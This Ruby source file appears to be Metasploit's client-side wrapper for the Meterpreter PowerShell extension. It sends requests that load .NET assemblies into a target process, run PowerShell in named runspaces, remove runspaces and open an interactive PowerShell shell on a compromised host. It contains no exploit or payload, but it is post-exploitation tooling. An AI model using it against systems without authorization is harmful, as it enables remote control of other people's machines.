# -*- coding: binary -*-
require 'rex/post/meterpreter/extensions/powershell/tlv'
require 'rex/post/meterpreter/extensions/powershell/command_ids'
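module Rex
module Post
module Meterpreter
module Extensions
module Powershell

###
#
# Client-side interface to the Meterpreter 'powershell' extension. It wraps
# the extension's commands for loading a .NET assembly into the target
# process, executing PowerShell code inside a named runspace ("session"),
# removing such a runspace, and opening an interactive PowerShell channel.
#
###
class Powershell < Extension

  def self.extension_id
    EXTENSION_ID_POWERSHELL
  end

  # Register this extension with the session under the 'powershell' alias.
  #
  # @param client [Rex::Post::Meterpreter::Client] the session that owns the
  #   extension
  def initialize(client)
    super(client, 'powershell')

    client.register_extension_aliases(
      [
        {
          'name' => 'powershell',
          'ext'  => self
        },
      ])
  end

  # Import a local file into the remote PowerShell environment.
  #
  # The path is read on the Framework side (the operator's filesystem), not on
  # the target. A +.ps1+ file is sent as script source through #execute_string;
  # a +.dll+ is shipped whole for the extension to load as a .NET assembly.
  # The extension match is case-insensitive so +.PS1+ / +.DLL+ are accepted too.
  #
  # @param opts [Hash]
  # @option opts [String] :file local path of the script or assembly (required)
  # @option opts [String] :session_id runspace to run a script in (scripts only)
  # @return [nil] when no :file was given
  # @return [Hash] the #execute_string result for a script, otherwise
  #   +{ loaded: true }+ for an assembly or +{ loaded: false }+ for a path with
  #   an extension this method does not handle
  def import_file(opts={})
    path = opts[:file]
    return nil unless path

    lowered = path.downcase

    # Scripts are plain source text; merge instead of assigning into opts so the
    # caller's hash is not mutated.
    if lowered.end_with?('.ps1')
      return execute_string(opts.merge(code: ::File.read(path)))
    end

    if lowered.end_with?('.dll')
      # TODO: perhaps do some kind of check to see if the DLL is a .NET assembly?
      #
      # binread keeps the bytes untouched, and the size TLV must carry the byte
      # count: String#length on a text-mode read counts characters, which is
      # smaller than the payload whenever the bytes happen to form multibyte
      # sequences in the default external encoding.
      binary = ::File.binread(path)

      request = Packet.create_request(COMMAND_ID_POWERSHELL_ASSEMBLY_LOAD)
      request.add_tlv(TLV_TYPE_POWERSHELL_ASSEMBLY_SIZE, binary.bytesize)
      request.add_tlv(TLV_TYPE_POWERSHELL_ASSEMBLY, binary)
      client.send_request(request)
      return { loaded: true }
    end

    { loaded: false }
  end

  # Tear down a named PowerShell runspace on the target.
  #
  # @param opts [Hash]
  # @option opts [String] :session_id the runspace to remove (required)
  # @return [Boolean] false when no :session_id was given, true once the
  #   request has been sent
  def session_remove(opts={})
    session_id = opts[:session_id]
    return false unless session_id

    request = Packet.create_request(COMMAND_ID_POWERSHELL_SESSION_REMOVE)
    request.add_tlv(TLV_TYPE_POWERSHELL_SESSIONID, session_id)
    client.send_request(request)
    true
  end

  # Run a string of PowerShell code on the target and collect its output.
  #
  # @param opts [Hash]
  # @option opts [String] :code the PowerShell source to execute (required)
  # @option opts [String] :session_id runspace to execute in; omitted when nil
  # @return [nil] when no :code was given
  # @return [Hash] +:output+ holds the result text returned by the extension;
  #   +:warning+ is present when the session currently holds a non-zero token
  #   handle, because that impersonation does not carry over to PowerShell
  def execute_string(opts={})
    code = opts[:code]
    return nil unless code

    request = Packet.create_request(COMMAND_ID_POWERSHELL_EXECUTE)
    request.add_tlv(TLV_TYPE_POWERSHELL_CODE, code)
    request.add_tlv(TLV_TYPE_POWERSHELL_SESSIONID, opts[:session_id]) if opts[:session_id]

    response = client.send_request(request)

    result = impersonation_warning
    result[:output] = response.get_tlv_value(TLV_TYPE_POWERSHELL_RESULT)
    result
  end

  # Open an interactive PowerShell channel on the target.
  #
  # @param opts [Hash]
  # @option opts [String] :session_id runspace the shell should attach to;
  #   omitted when nil
  # @return [Hash] +:channel+ is a synchronous StreamPool bound to the channel
  #   id the extension returned; +:warning+ as for #execute_string
  # @raise [RuntimeError] if the reply carries no channel id
  def shell(opts={})
    request = Packet.create_request(COMMAND_ID_POWERSHELL_SHELL)
    request.add_tlv(TLV_TYPE_POWERSHELL_SESSIONID, opts[:session_id]) if opts[:session_id]

    response = client.send_request(request)
    channel_id = response.get_tlv_value(TLV_TYPE_CHANNEL_ID)
    # RuntimeError rather than Exception so a plain `rescue` in the caller
    # handles the failure instead of it escaping past StandardError handlers.
    raise "We did not get a channel back!" if channel_id.nil?

    result = impersonation_warning
    result[:channel] = Rex::Post::Meterpreter::Channels::Pools::StreamPool.new(
      client, channel_id, 'powershell_psh', CHANNEL_FLAG_SYNCHRONOUS, response
    )
    result
  end

  private

  # Shared by #execute_string and #shell: a fresh result hash that already
  # carries the impersonation warning when the session's token handle is
  # non-zero, and is empty otherwise.
  #
  # @return [Hash]
  def impersonation_warning
    result = {}
    handle = client.sys.config.get_token_handle
    result[:warning] = 'Impersonation will not apply to PowerShell.' if handle != 0
    result
  end

end

end; end; end; end; end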